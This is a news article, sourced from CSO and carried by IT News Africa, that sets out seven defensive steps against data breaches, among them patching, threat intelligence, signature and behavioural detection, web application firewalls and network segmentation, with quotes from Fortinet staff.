7 Steps to Deal with a Data Breach

171
Sourced from CSO.

As data breaches continue to make their way into the public news cycle, individuals and organizations alike are looking for ways to protect their financial and personal information. When it comes to this type of threat, two things are known to be true – the cost of a data breach is very high and so are the chances that it could happen again if you have been breached before.

The impact of a data breach can have long-term effects on both the financial and reputational state of an organization. Despite this, some still do not have the security solutions in place that are required to effectively defend modern, digital environments from data breaches.

Organizations must deploy solutions and adopt certain strategies designed to work together to protect critical data and assets from being compromised or stolen.


Here are a few steps to take to ensure you are protected against data breaches:

1. Practise Security Hygiene 

It may come as a surprise that a majority of data breaches are caused by threats that have been around for weeks, months, or, in some cases, even years. In fact, most of the attacks being detected today target vulnerabilities that organizations have had the opportunity to patch for at least three years.

With this in mind, organizations must prioritize patching every catalogued device immediately, even before establishing a formal protocol for patches and updates. And those devices that cannot be patched or updated should be replaced or protected with proximity controls such as IPS systems and zero-trust network access.

And in addition to patching, security teams must also ensure these devices are properly segmented, and that the network has the ability to automatically detect and quarantine compromised devices.

2. Leverage Threat Intelligence

When working to stay ahead of cybercriminals, organizations should not underestimate the importance of advanced threat intelligence. While local intelligence gathered across one’s network is a critical piece of the puzzle, it alone cannot provide enough data to be truly effective.

“Threat feeds are crucial in keeping security teams up to date on the latest exploits around the globe,” says Jonathan Nguyen-Duy, VP of Global Field CISO Team at Fortinet.

“The data that is pulled from these feeds can be converted into actionable intelligence that can then be combined with local intelligence and then distributed across the security framework, resulting in maximum protection.”

3. Use Signature-based Detection Tools

Most vulnerabilities that have been or are being exploited are known, meaning attacks targeting those vulnerabilities can be detected via signatures. By employing signature-based detection tools, security teams can quickly scan the network and fend off any attempts at infiltration or the execution of exploits targeting known vulnerabilities.

“Signature-based tools are [also] a great option for complex environments that feature various IoT and other interconnected devices that cannot be updated,” explains Joe Robertson, Field CISO at Fortinet.

4. Understand Behavioral-based Analytics and Data Sanitization

For those threats that do not have a recognizable signature, organizations must employ advanced threat protection solutions and User Entity Behavior Analytics (UEBA) tools. Since most threat actors also have the ability to learn and mimic legitimate traffic patterns to evade protection, security tools need to do more than just looking for low-hanging malware. They must also “conduct an in-depth inspection and analysis that focuses on patterns that can then be used to detect and diagnose malicious intent,” according to Alain Sanchez.

Finally, these systems should be able to proactively and automatically intervene even before an attack takes place. By employing data sanitization strategies, such as Content Disarm and Reconstruction (CDR) tools, organizations can get ahead of potential threats, removing malicious content from specific files and stopping an attack in its tracks.

5. Use Web Application Firewalls

Today’s cyber threats are anything but traditional, therefore the same must be true for today’s security tools. Despite the inherent risk of web-based attacks, many organizations are not able to adequately test or harden their web applications before they are deployed.

Nguyen-Duy explains that by employing a web application firewall (WAF), “organizations can achieve a deep level of inspection of web application traffic that goes beyond what traditional NGFW technology can offer.”

6. Replace Traditional Point Security Technologies

Most traditional point security solutions tend to operate in isolation, meaning they are not getting the full picture of the network and can only respond to what is directly in front of them. Considering the sophisticated nature of today’s multi-vector cyber threats, embracing a fabric-based approach to security is critical for keeping constantly-evolving network architectures protected against data breaches.

Sanchez stresses the importance of this fabric architecture, stating, “It offers benefits that are necessary for the face of a data breach, such as a single pane of glass management for visibility purposes and automated response to attacks.”

7. Implement Network Segmentation

Considering the frequency at which data and applications flow across today’s digital environments, organizations must also segment their networks as a means of preventing threats from spreading. This can be achieved through the deployment of internal network segmentation firewalls and the establishment of macro- and micro-segmentation strategies.

“By doing this, security teams can create consistent policies across the network and more effectively manage and secure the movement of data and applications,” explains Robertson.

The process of segmentation is especially critical when large amounts of data are being collected and correlated in either a single environment or throughout multiple network environments. This will ensure that the correct controls are in place to detect threats that have permeated the perimeter of one network segment and are moving across the environment – without it, the success of a data breach that can move end-to-end across the network is essentially inevitable.

The frequency and sophistication of today’s data breaches highlight the fact that security cannot be pushed to the sidelines. Defending against these threats requires proactive strategies, as noted by the cybersecurity professionals quoted above, that not only rely on security solutions but also organization-wide awareness of these risks.

By embracing a range of integrated and automated strategies that can be deployed broadly across the network, organizations can protect themselves and their customers from the spectre of modern breaches.

Edited by Luis Monzon

Follow Luis Monzon on Twitter

Follow IT News Africa on Twitter